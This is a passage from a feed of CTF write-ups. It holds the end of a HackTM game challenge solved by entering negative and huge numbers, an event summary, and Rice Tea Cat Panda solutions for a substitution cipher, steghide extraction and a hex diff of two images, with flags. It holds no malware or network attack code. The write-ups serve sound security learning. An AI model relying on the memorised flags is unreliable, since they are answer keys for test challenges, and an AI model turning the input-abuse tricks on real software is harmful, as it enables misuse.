<span class="n">Time</span> <span class="n">passes</span>...
<span class="n">Slowly</span>...
<span class="mf">9e9</span>
-------------------------------
<span class="n">Boss</span> <span class="n">wants</span> <span class="nb">to</span> <span class="n">know</span> <span class="nb">how</span> <span class="n">many</span> <span class="n">hours</span> <span class="n">you</span> <span class="n">worked:</span> > -<span class="mi">1</span>
-<span class="mf">1.0</span> <span class="n">hours</span> <span class="nb">at</span> <span class="nv">$1</span><span class="o">/</span><span class="nb">hour</span>? <span class="n">That's</span> <span class="nv">$-1</span><span class="mf">.0</span>.
<span class="nv">$-1</span><span class="mf">.0</span> <span class="n">received</span>.
-------------------------------
<span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mo">06</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$-1</span><span class="mf">.0</span>
-------------------------------
</code></pre></div>
<p>Perfect! We loose one dollar with the work. Let's restaret and but something that can fit 3 chars and big number: <code>9e9</code> or <code>inf</code>.</p>
<div class="highlight"><pre><span></span><code>-------------------------------
<span class="n">Going</span> <span class="nb">to</span> <span class="n">work</span>...
<span class="n">Time</span> <span class="n">passes</span>...
<span class="n">Slowly</span>...
<span class="mf">9e9</span>
-------------------------------
<span class="n">Boss</span> <span class="n">wants</span> <span class="nb">to</span> <span class="n">know</span> <span class="nb">how</span> <span class="n">many</span> <span class="n">hours</span> <span class="n">you</span> <span class="n">worked:</span> > <span class="mf">9e9</span>
<span class="mf">9000000000.0</span> <span class="n">hours</span> <span class="nb">at</span> <span class="nv">$1</span><span class="o">/</span><span class="nb">hour</span>? <span class="n">That's</span> <span class="nv">$9000000000</span><span class="mf">.0</span>.
<span class="nv">$9000000000</span><span class="mf">.0</span> <span class="n">received</span>.
-------------------------------
<span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mo">06</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$9000000000</span><span class="mf">.0</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
</code></pre></div>
<p>Nice. We have now a lot of money. Need to get a sword to enter the dragons cave.</p>
<div class="highlight"><pre><span></span><code>> 1
-------------------------------
Welcome to the store:
-------------------------------
Level 1 Sword: 10 Damage
Price: $10
-------------------------------
Level 2 Sword: 100 Damage
Price: $100
-------------------------------
Level 3 Sword: 1,000 Damage
Price: $1,000
-------------------------------
Level 4 Sword: 10,000 Damage
Price: $1,000,000
-------------------------------
Level 5 Sword: 100,000 Damage
Price: $1,000,000,000
-------------------------------
What do you want? (1-5 or e for exit) > 5
Received Sword level 5.
-------------------------------
</code></pre></div>
<p>Ready to fight and get the flag!</p>
<div class="highlight"><pre><span></span><code><span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mi">12</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
<span class="n">Your</span> <span class="n">sword:</span> <span class="mi">5</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
> <span class="mi">3</span>
-------------------------------
<span class="n">Welcome</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon's</span> <span class="n">cave</span>
-------------------------------
<span class="n">The</span> <span class="n">dragon</span> <span class="k">is</span> <span class="n">awake</span>.
<span class="n">He</span> <span class="n">sees</span> <span class="n">you</span> <span class="nb">first</span> <span class="o">and</span> <span class="n">instantly</span> <span class="n">kills</span> <span class="n">you</span> <span class="k">with</span> <span class="n">a</span> <span class="n">large</span> <span class="n">fireball</span>.
<span class="n">Game</span> <span class="n">over</span>
</code></pre></div>
<p>All of this to get instantly turn into a big meat ball :'(. Ok, the title is <code>The dragon sleeps at night</code>. So, it's a hint. We can only go to the cave when it's night in the game (18:00).</p>
<p>Let's do the same but with a extra going/back to the shop:</p>
<div class="highlight"><pre><span></span><code>[...]
-------------------------------
Welcome to the dragon's cave
-------------------------------
You see the dragon sleeping next to a pile of bodies.
They look disturbingly fresh.
Carrying your glorious level 5 sword, you slowly walk over.
Carefully, you position the mighty weapon exactly over his skull.
BOOM! Perfect hit!
The dragon wakes up! He's not dead?
I was told level 5 would be enough!
'if only there was a level 6 sword' are your last thoughts...
...as the dragon obliterates you with a hurricane of fire.
Game over
</code></pre></div>
<p>Nooooo. We need a higher sword level to beat this dragon.</p>
<p>So, take a look to the storage.</p>
<div class="highlight"><pre><span></span><code><span class="err">> 5</span>
<span class="err">-------------------------------</span>
<span class="err">Storage for up to (1) sword.</span>
<span class="err">Please note: Swords degrade by 1 level for each day they are left in storage.</span>
<span class="err">-------------------------------</span>
</code></pre></div>
<p>Hum, for each day in the storage, the sword will loose a level. But, maybe as the worked hours, we can deposit the sword and wait a negative number of day. Let's try this!</p>
<div class="highlight"><pre><span></span><code>Storage is empty.
Do you want to deposit your sword? (y/n) > y
Deposited sword level 5
-------------------------------
Day: 0
Time: 18:00
Your balance: $8000000000.0
-------------------------------
1: Go to store
2: Go to work
3: Go to dragons cave
4: Go home
5: Storage
> 4
Your home.
Here you can take a rest.
How many days do you want to rest for? > -1
Sleeping for -1 days
A sword in storage has degraded from 5 to 6.
You woke up well rested.
</code></pre></div>
<p>Worked as intended! Let's grab back the sword and fight back the dragon for the last time!</p>
<div class="highlight"><pre><span></span><code>-------------------------------
<span class="n">Day:</span> -<span class="mi">1</span>
<span class="n">Time:</span> <span class="mi">12</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
> <span class="mi">5</span>
-------------------------------
<span class="n">Storage</span> <span class="k">for</span> <span class="n">up</span> <span class="nb">to</span> (<span class="mi">1</span>) <span class="n">sword</span>.
<span class="n">Please</span> <span class="n">note:</span> <span class="n">Swords</span> <span class="n">degrade</span> <span class="n">by</span> <span class="mi">1</span> <span class="nb">level</span> <span class="k">for</span> <span class="n">each</span> <span class="nb">day</span> <span class="n">they</span> <span class="n">are</span> <span class="n">left</span> <span class="nb">in</span> <span class="n">storage</span>.
-------------------------------
<span class="n">Storage</span> <span class="nb">contains</span> <span class="n">a</span> <span class="n">sword</span> <span class="nb">level</span> <span class="mi">6</span>
<span class="n">Do</span> <span class="n">you</span> <span class="n">want</span> <span class="nb">to</span> <span class="nb">take</span> <span class="n">the</span> <span class="n">sword</span> <span class="n">out</span>? (<span class="n">y</span><span class="o">/</span><span class="n">n</span>) > <span class="n">y</span>
<span class="n">Receiving</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span>.
-------------------------------
<span class="n">Day:</span> -<span class="mi">1</span>
<span class="n">Time:</span> <span class="mi">18</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
<span class="n">Your</span> <span class="n">sword:</span> <span class="mi">6</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
> <span class="mi">3</span>
-------------------------------
<span class="n">Welcome</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon's</span> <span class="n">cave</span>
-------------------------------
<span class="n">You</span> <span class="n">see</span> <span class="n">the</span> <span class="n">dragon</span> <span class="n">sleeping</span> <span class="nb">next</span> <span class="nb">to</span> <span class="n">a</span> <span class="n">pile</span> <span class="nb">of</span> <span class="n">bodies</span>.
<span class="n">They</span> <span class="n">look</span> <span class="n">disturbingly</span> <span class="n">fresh</span>.
<span class="n">Carrying</span> <span class="n">your</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span>, <span class="n">you</span> <span class="n">walk</span> <span class="n">over</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon</span>
<span class="n">You're</span> <span class="n">still</span> <span class="n">dizzy</span> <span class="nb">from</span> <span class="n">the</span> <span class="n">time</span> <span class="n">travelling</span>
<span class="n">About</span> <span class="n">half</span> <span class="n">way</span> <span class="n">towards</span> <span class="n">the</span> <span class="n">dragon</span>, <span class="n">the</span> <span class="n">blade</span> <span class="n">starts</span> <span class="n">vibrating</span>
<span class="n">As</span> <span class="k">if</span> <span class="n">by</span> <span class="n">magic</span>, <span class="n">it's</span> <span class="n">pulled</span> <span class="n">out</span> <span class="nb">of</span> <span class="n">your</span> <span class="n">hands</span>, <span class="o">and</span> <span class="n">towards</span> <span class="n">the</span> <span class="n">dragon</span>
<span class="n">As</span> <span class="n">it</span> <span class="n">reaches</span> <span class="n">approximately</span> <span class="n">Mach</span> <span class="mi">2</span> <span class="nb">right</span> <span class="o">before</span> <span class="n">impact</span>, <span class="n">you</span> <span class="nb">take</span> <span class="n">cover</span> <span class="n">behind</span> <span class="n">a</span> <span class="n">cliff</span>
<span class="n">The</span> <span class="n">impact</span> <span class="nb">can</span> <span class="n">only</span> <span class="n">be</span> <span class="n">compared</span> <span class="nb">to</span> <span class="n">a</span> <span class="n">small</span> <span class="n">bomb</span>. <span class="n">The</span> <span class="n">entire</span> <span class="n">cave</span> <span class="n">shakes</span> <span class="nb">not</span> <span class="nb">unlike</span> <span class="n">during</span> <span class="n">an</span> <span class="n">earthquake</span>.
<span class="n">As</span> <span class="n">you</span> <span class="n">look</span> <span class="n">up</span> <span class="nb">from</span> <span class="n">you</span> <span class="n">cover</span>, <span class="n">you</span> <span class="n">see</span> <span class="n">the</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span> <span class="n">floating</span> <span class="nb">in</span> <span class="n">place</span>, <span class="n">just</span> <span class="n">where</span> <span class="n">the</span> <span class="n">dragon</span> <span class="n">used</span> <span class="nb">to</span> <span class="n">be</span>.
<span class="n">You</span> <span class="n">walk</span> <span class="n">up</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">sword</span> <span class="o">and</span> <span class="n">inspect</span> <span class="n">it</span> <span class="n">closely</span>.
<span class="n">On</span> <span class="n">the</span> <span class="n">blade</span> <span class="n">you</span> <span class="nb">can</span> <span class="n">see</span> <span class="n">a</span> <span class="n">faint</span> <span class="n">inscription</span>. <span class="n">You</span> <span class="n">are</span> <span class="n">pretty</span> <span class="n">sure</span> <span class="n">this</span> <span class="n">wasn't</span> <span class="n">here</span> <span class="o">before</span>:
<span class="n">HackTM</span>{<span class="n">g3t_m0re_sl33p_and_dr1nk_m0re_water</span>}
</code></pre></div>RTCP20202020-01-26T00:00:00+01:002020-01-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-26:/rtcp2020.html<p><em><a href="https://riceteacatpanda.wtf">🍚🍵🐈🐼</a> - <a href="https://ctftime.org/event/910">CTFTime</a></em></p>
<p>Rice Tea Cat Panda CTF was a CTF during 5 days and first edition. I really enjoyed it. Challenges, peoples, ambiance, everything was amazing.</p>
<p>I want to thanks a lot all the admins (Jess Fan, Tida Ngov, Vihan Bhargava, Jess (the other one)/J) and I'm waiting for the …</p><p><em><a href="https://riceteacatpanda.wtf">🍚🍵🐈🐼</a> - <a href="https://ctftime.org/event/910">CTFTime</a></em></p>
<p>Rice Tea Cat Panda CTF was a CTF during 5 days and first edition. I really enjoyed it. Challenges, peoples, ambiance, everything was amazing.</p>
<p>I want to thanks a lot all the admins (Jess Fan, Tida Ngov, Vihan Bhargava, Jess (the other one)/J) and I'm waiting for the next edition <3.</p>
<p>I finish 37th (1323 people who mark at least 1 point) with 10582 points.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/rtcp/bilan.png"></p>
<h2>Rice Goddess</h2>
<h2>Cryptography</h2>
<ul>
<li><a href="/rtcp-hoooooooooomeeeeee-runnnnnnnnnnnnn.html">HOOOOOOOOOOMEEEEEE RUNNNNNNNNNNNNN!!!!!</a></li>
<li><a href="/rtcp-dont-give-the-giant-a-cookie.html">Don't Give The GIANt a COOKie</a></li>
<li><a href="/rtcp-15.html">15</a></li>
<li><a href="/rtcp-notice-me-senpai.html">notice me senpai</a></li>
<li><a href="/rtcp-wrong-way.html">Wrong Way</a></li>
<li><a href="/rtcp-thats-some-interesting-tears.html">That's Some Interesting Tea(rs)</a></li>
<li><a href="/rtcp-thats-a-lot-of-stuff.html">That's a Lot of Stuff...</a></li>
<li><a href="/rtcp-pandas-like-salads.html">Pandas Like Salads</a></li>
<li><a href="/rtcp-code-on.html">Code On</a></li>
<li><a href="/rtcp-i-love-you-3000.html">I Love You 3000</a></li>
<li><a href="/rtcp-humps-day.html">Hump's Day</a></li>
</ul>
<h2>AI</h2>
<h2>Reverse Engineering</h2>
<h2>General Skills</h2>
<ul>
<li><a href="/rtcp-pandamonium.html">pandamonium</a></li>
<li><a href="/rtcp-treeeeeeee.html">Treeeeeeee</a></li>
<li><a href="/rtcp-ghost-in-the-system.html">ghost-in-the-system</a></li>
</ul>
<h2>Web</h2>
<ul>
<li><a href="/rtcp-no-sleep.html">No Sleep</a></li>
<li><a href="/rtcp-uwu.html">Uwu?</a></li>
<li><a href="/rtcp-web-invaders.html">Web Invaders</a></li>
<li><a href="/rtcp-growls-at-the-chicken.html">Growls at the chicken</a></li>
</ul>
<h2>Binary/Excecutable</h2>
<ul>
<li><a href="/rtcp-tea-clicker.html">Tea Clicker</a></li>
<li><a href="/rtcp-work-in-progress.html">Work In Progress</a></li>
</ul>
<h2>Forensics</h2>
<ul>
<li><a href="/rtcp-chugalugs-footpads.html">Chugalug's Footpads</a></li>
<li><a href="/rtcp-basmati-rice-64.html">BASmati ricE 64</a></li>
</ul>
<h2>Misc</h2>
<ul>
<li><a href="/rtcp-strong-password.html">Strong Password</a></li>
</ul>RTCP - 152020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-15.html<p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
Lhzdwt eceowwl: Dhtnwt Pcln Eaao Qwoohvw
Okw qsyo okcln bah'i fslo cl baht Dhtnwt Pcln dhtnwt cy yazwalw'y eaao ehlnhy. Dho sy co ohtly aho, okso zcnko dw fkso bah nwo. S 4vksllwt hmqasiwi s mkaoa slalbzahyqb oa okw ycow ykafvsycln kcy ewwo cl …</code></pre></div><p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
Lhzdwt eceowwl: Dhtnwt Pcln Eaao Qwoohvw
Okw qsyo okcln bah'i fslo cl baht Dhtnwt Pcln dhtnwt cy yazwalw'y eaao ehlnhy. Dho sy co ohtly aho, okso zcnko dw fkso bah nwo. S 4vksllwt hmqasiwi s mkaoa slalbzahyqb oa okw ycow ykafvsycln kcy ewwo cl s mqsyocv dcl ae qwoohvw, fcok okw yosowzwlo: "Okcy cy okw qwoohvw bah wso so Dhtnwt Pcln." Sizcoowiqb, kw ksi ykawy al. Dho okso'y wgwl fatyw.
Okw mayo fwlo qcgw so 11:38 MZ al Xhqb 16, sli s zwtw ofwlob zclhowy qsowt, okw Dhtnwt Pcln cl rhwyocal fsy sqwtowi oa okw tanhw wzmqabww. So qwsyo, C kamw kw'y tanhw. Kaf ici co ksmmwl? Fwqq, okw DP wzmqabww ksil'o twzagwi okw WJCE isos etaz okw hmqasiwi mkaoa, fkcvk yhnnwyowi okw vhqmtco fsy yazwfkwtw cl Zsbecwqi Kwcnkoy, Akca. Okcy fsy so 11:47. Oktww zclhowy qsowt so 11:50, okw Dhtnwt Pcln dtslvk siitwyy fsy mayowi fcok fcykwy ae ksmmb hlwzmqabzwlo. Ecgw zclhowy qsowt, okw lwfy yosocal fsy valosvowi db slaokwt 4vksllwt. Sli oktww zclhowy qsowt, so 11:58, s qclp fsy mayowi: DP'y "Owqq hy sdaho hy" alqclw eathz. Okw eaao mkaoa, aokwtfcyw plafl sy wjkcdco S, fsy soosvkwi. Vqwgwqsli Yvwlw Zsnsuclw valosvowi okw DP cl rhwyocal okw lwjo isb. Fkwl rhwyocalwi, okw dtwspesyo ykceo zslsnwt ysci "Ak, C plaf fka okso cy. Kw'y nwoocln ectwi." Zbyowtb yaqgwi, db 4vksl. Laf fw vsl sqq na dsvp oa wsocln aht esyo eaai cl mwsvw.
tovm{v4T3Ehq_f1oK_3J1e_i4O4}
Challenge Author: Jess (the other one)/J
</code></pre></div>
<p>We need to revert the flag part to get back the clear one. <a href="https://www.dcode.fr/substitution-monoalphabetique">dCode</a> offer a nice tool to perform bruteforce attack against the text to find the correspondance and get back all the clear text. We need to use all the text and not only the flag part to find it.</p>
<p>The clear text is :</p>
<div class="highlight"><pre><span></span><code>NUMBER FIFTEEN: BURGER KING FOOT LETTUCE
THE LAST THING YOU'D WANT IN YOUR BURGER KING BURGER IS SOMEONE'S FOOT FUNGUS. BUT AS IT TURNS OUT, THAT MIGHT BE WHAT YOU GET. A 4CHANNER UPLOADED A PHOTO ANONYMOUSLY TO THE SITE SHOWCASING HIS FEET IN A PLASTIC BIN OF LETTUCE, WITH THE STATEMENT: "THIS IS THE LETTUCE YOU EAT AT BURGER KING." ADMITTEDLY, HE HAD SHOES ON. BUT THAT'S EVEN WORSE.
THE POST WENT LIVE AT 11:38 PM ON JULY 16, AND A MERE TWENTY MINUTES LATER, THE BURGER KING IN QUESTION WAS ALERTED TO THE ROGUE EMPLOYEE. AT LEAST, I HOPE HE'S ROGUE. HOW DID IT HAPPEN? WELL, THE BK EMPLOYEE HADN'T REMOVED THE EXIF DATA FROM THE UPLOADED PHOTO, WHICH SUGGESTED THE CULPRIT WAS SOMEWHERE IN MAYFIELD HEIGHTS, OHIO. THIS WAS AT 11:47. THREE MINUTES LATER AT 11:50, THE BURGER KING BRANCH ADDRESS WAS POSTED WITH WISHES OF HAPPY UNEMPLOYMENT. FIVE MINUTES LATER, THE NEWS STATION WAS CONTACTED BY ANOTHER 4CHANNER. AND THREE MINUTES LATER, AT 11:58, A LINK WAS POSTED: BK'S "TELL US ABOUT US" ONLINE FORUM. THE FOOT PHOTO, OTHERWISE KNOWN AS EXHIBIT A, WAS ATTACHED. CLEVELAND SCENE MAGAZINE CONTACTED THE BK IN QUESTION THE NEXT DAY. WHEN QUESTIONED, THE BREAKFAST SHIFT MANAGER SAID "OH, I KNOW WHO THAT IS. HE'S GETTING FIRED." MYSTERY SOLVED, BY 4CHAN. NOW WE CAN ALL GO BACK TO EATING OUR FAST FOOD IN PEACE.
RTCP{C4R3FUL_W1TH_3X1F_D4T4}
</code></pre></div>RTCP - BASmati ricE 642020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-basmati-rice-64.html<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
There's a flag in that bowl somewhere...
Replace all zs with _ in your flag and wrap in rtcp{...}.
</code></pre></div>
<p>We have a nice bowl of rice as the file :</p>
<p><img alt="rice-bowl.jpg" src="https://blog.nlegall.fr/images/rtcp/rice-bowl.jpg"></p>
<p>Ok, let's try <code>steghide</code> to get some information about the file:</p>
<div class="highlight"><pre><span></span><code>$ steghide info rice-bowl.jpg
<span class="s2">"rice-bowl …</span></code></pre></div><p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
There's a flag in that bowl somewhere...
Replace all zs with _ in your flag and wrap in rtcp{...}.
</code></pre></div>
<p>We have a nice bowl of rice as the file :</p>
<p><img alt="rice-bowl.jpg" src="https://blog.nlegall.fr/images/rtcp/rice-bowl.jpg"></p>
<p>Ok, let's try <code>steghide</code> to get some information about the file:</p>
<div class="highlight"><pre><span></span><code>$ steghide info rice-bowl.jpg
<span class="s2">"rice-bowl.jpg"</span>:
format: jpeg
capacity: <span class="m">3</span>,3 KB
Try to get information about embedded data ? <span class="o">(</span>y/n<span class="o">)</span> y
Enter passphrase:
</code></pre></div>
<p>A password is asked to show the information. Hum, maybe the password is empty:</p>
<div class="highlight"><pre><span></span><code>$ steghide info rice-bowl.jpg
<span class="s2">"rice-bowl.jpg"</span>:
format: jpeg
capacity: <span class="m">3</span>,3 KB
Try to get information about embedded data ? <span class="o">(</span>y/n<span class="o">)</span> y
Enter passphrase:
embedded file <span class="s2">"steganopayload167748.txt"</span>:
size: <span class="m">21</span>,0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf rice-bowl.jpg
Enter passphrase:
wrote extracted data to <span class="s2">"steganopayload167748.txt"</span>.
</code></pre></div>
<p>YEAH! We extract with success the file. The content is quite stange:</p>
<div class="highlight"><pre><span></span><code>cat steganopayload167748.txt
�I��Y��<span class="p">;</span>a�x9�
��y��<span class="o">=</span>�
</code></pre></div>
<p>Maybe we don't need to decode, but encode its content. Base64 is a good start to try with it:</p>
<div class="highlight"><pre><span></span><code>$ cat steganopayload167748.txt<span class="p">|</span> base64
s0m3t1m35zth1ng5zAr3z3nc0D3d
$ cat steganopayload167748.txt<span class="p">|</span> base64 <span class="p">|</span> sed <span class="s1">'s/z/_/g'</span>
s0m3t1m35_th1ng5_Ar3_3nc0D3d
</code></pre></div>
<p>And we got the flag : <code>rtcp{s0m3t1m35_th1ng5_Ar3_3nc0D3d}</code>.</p>RTCP - Chugalug's Footpads2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-chugalugs-footpads.html<p><em>solves : 174</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Chugalug makes footpads that he can chug and lug. However, his left one is different from his right... I wonder why?
</code></pre></div>
<p>We have two images and need to find the flag from this two files without any other hint.</p>
<p><img alt="right.jpg" src="https://blog.nlegall.fr/images/rtcp/right.jpg"></p>
<p><img alt="left.jpg" src="https://blog.nlegall.fr/images/rtcp/left.jpg"></p>
<p>Let's begging with some checks:</p>
<div class="highlight"><pre><span></span><code>$ file right …</code></pre></div><p><em>solves : 174</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Chugalug makes footpads that he can chug and lug. However, his left one is different from his right... I wonder why?
</code></pre></div>
<p>We have two images and need to find the flag from this two files without any other hint.</p>
<p><img alt="right.jpg" src="https://blog.nlegall.fr/images/rtcp/right.jpg"></p>
<p><img alt="left.jpg" src="https://blog.nlegall.fr/images/rtcp/left.jpg"></p>
<p>Let's begging with some checks:</p>
<div class="highlight"><pre><span></span><code>$ file right.jpg
right.jpg: JPEG image data, Exif standard: <span class="o">[</span>TIFF image data, little-endian, <span class="nv">direntries</span><span class="o">=</span><span class="m">0</span><span class="o">]</span>, baseline, precision <span class="m">8</span>, 1366x855, components <span class="m">3</span>
$ binwalk right.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
<span class="m">0</span> 0x0 JPEG image data, EXIF standard
<span class="m">12</span> 0xC TIFF image data, little-endian offset of first image directory: <span class="m">8</span>
</code></pre></div>
<p>No other data embeded in the file. Now, check what is different between this two files:</p>
<div class="highlight"><pre><span></span><code>diff right.jpg left.jpg
Binary files right.jpg and left.jpg differ
</code></pre></div>
<p>Ok, <code>diff</code> sees something different but not showing it. The concertion to hexadecimal format can help to show it:</p>
<div class="highlight"><pre><span></span><code>$ xxd right.jpg > right.hex
$ xxd left.jpg > left.hex
$ diff right.hex left.hex
108c108
< 000006b0: a531 <span class="m">5505</span> 7e28 a552 4d1c e080 c5f8 7e6a .1U.~<span class="o">(</span>.RM.....~j
---
> 000006b0: a531 <span class="m">5505</span> 7e28 a572 741c e080 c5f8 7e6a .1U.~<span class="o">(</span>.rt.....~j
128c128
< 000007f0: e0e8 00f4 <span class="m">1920</span> 74fe <span class="m">4551</span> <span class="m">1771</span> e1f4 503a ..... t.EQ.q..P:
---
> 000007f0: e0e8 00f4 <span class="m">1920</span> 74fe <span class="m">6370</span> <span class="m">1771</span> e1f4 503a ..... t.cp.q..P:
146c146
< <span class="m">00000910</span>: <span class="m">9202</span> 8c10 <span class="m">3230</span> c070 <span class="m">7542</span> <span class="m">4006</span> cbe2 a029 ....20.puB@....<span class="o">)</span>
---
> <span class="m">00000910</span>: <span class="m">9202</span> 8c10 <span class="m">3230</span> c07b <span class="m">5468</span> <span class="m">4006</span> cbe2 a029 ....20.<span class="o">{</span>Th@....<span class="o">)</span>
179c179
< 00000b20: 931c 501c 79a0 336c <span class="m">9014</span> cfc9 00f8 <span class="m">3040</span> ..P.y.3l......0@
---
> 00000b20: 931c 501c <span class="m">7933</span> 7a65 <span class="m">9014</span> cfc9 00f8 <span class="m">3040</span> ..P.y3ze......0@
189c189
< 00000bc0: <span class="m">0220</span> 9a64 81bf 9b64 <span class="m">8139</span> <span class="m">1428</span> 1b06 0fc7 . .d...d.9.<span class="o">(</span>....
---
> 00000bc0: <span class="m">0220</span> 9a64 81bf 9b5f 5e39 <span class="m">7228</span> 1b06 0fc7 . .d..._^9r<span class="o">(</span>....
195c195
< 00000c20: 0cb8 <span class="m">2065</span> c071 <span class="m">8668</span> 165c <span class="m">1022</span> dfc5 02c4 .. e.q.h.<span class="se">\.</span><span class="s2">"....</span>
<span class="s2">---</span>
<span class="s2">> 00000c20: 0cb8 2065 c033 8668 165c 1022 dfc5 02c4 .. e.3.h.\."</span>....
209c209
< 00000d00: 75a1 540c <span class="m">7234</span> 409c b57c <span class="m">9037</span> 380a 200b u.T.r4@..<span class="p">|</span>.78. .
---
> 00000d00: 75a1 545f <span class="m">7234</span> 409c b57c <span class="m">9037</span> 380a 200b u.T_r4@..<span class="p">|</span>.78. .
227c227
< 00000e20: <span class="m">7541</span> <span class="m">8170</span> 73c5 <span class="m">0314</span> 8f11 9a04 5c54 <span class="m">2031</span> uA.ps.......<span class="se">\T</span> <span class="m">1</span>
---
> 00000e20: <span class="m">7541</span> <span class="m">8170</span> 73c5 <span class="m">0314</span> 8f6e <span class="m">3004</span> 5c54 <span class="m">2031</span> uA.ps....n0.<span class="se">\T</span> <span class="m">1</span>
264c264
< <span class="m">00001070</span>: <span class="m">0004</span> <span class="m">0542</span> <span class="m">0301</span> 4a7d <span class="m">1030</span> <span class="m">4140</span> f03f <span class="m">4010</span> ...B..J<span class="o">}</span>.0A@.?@.
---
> <span class="m">00001070</span>: <span class="m">0004</span> <span class="m">0542</span> <span class="m">0301</span> 547d <span class="m">1030</span> <span class="m">4140</span> f03f <span class="m">4010</span> ...B..T<span class="o">}</span>.0A@.?@.
276c276
< <span class="m">00001130</span>: 0ba0 0b79 200e 7c38 206e 7f8a 028c c500 ...y .<span class="p">|</span><span class="m">8</span> n......
---
> <span class="m">00001130</span>: 0ba0 0b79 630e 7c38 206e 7f8a 488c c500 ...yc.<span class="p">|</span><span class="m">8</span> n..H...
299c299
< 000012a0: f18a 047e <span class="m">1920</span> 32e7 <span class="m">9203</span> d4d8 <span class="m">5103</span> 0e63 ...~. <span class="m">2</span>.....Q..c
---
> 000012a0: f18a 047e <span class="m">1920</span> 346e <span class="m">9203</span> d4d8 <span class="m">5103</span> 0e63 ...~. 4n....Q..c
<span class="m">321</span>,322c321,322
< <span class="m">00001400</span>: dcd4 a0f0 2fe2 a844 97aa 07ea c8a0 0bb8 ..../..D........
< <span class="m">00001410</span>: e250 <span class="m">1973</span> e281 b9c0 d020 010f 4c4a 04f5 .P.s..... ..LJ..
---
> <span class="m">00001400</span>: dcd4 a0f0 43e2 a844 97aa 07ea c8a0 0bb8 ....C..D........
> <span class="m">00001410</span>: e250 <span class="m">1973</span> e281 b9c0 d020 010f <span class="m">3161</span> 04f5 .P.s..... ..1a..
338c338
< <span class="m">00001510</span>: 110f 135c <span class="m">3240</span> aaf4 f240 176f aa00 3e54 ...<span class="se">\2</span>@...@.o..>T
---
> <span class="m">00001510</span>: 110f 135c <span class="m">3240</span> aa35 7d40 176f aa00 3e54 ...<span class="se">\2</span>@.5<span class="o">}</span>@.o..>T
</code></pre></div>
<p>OH! If we keep only the differences, we got with the two first lines <code>rtcp</code>. Let's doing for all the lines!</p>
<p>And finally, we got the entire falg: <code>rtcp{Th3ze_^r3_n0TcH4nC1a5}</code>.</p>RTCP - Code On2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-code-on.html<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 500
My houseplant and I were working on a biology assignment together. Yes, my houseplant. Don't question it. Anyways, she ended up giving me a new cipher to use in my next project! So I'm giving it to my biology friends to see if they …</code></pre></div><p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 500
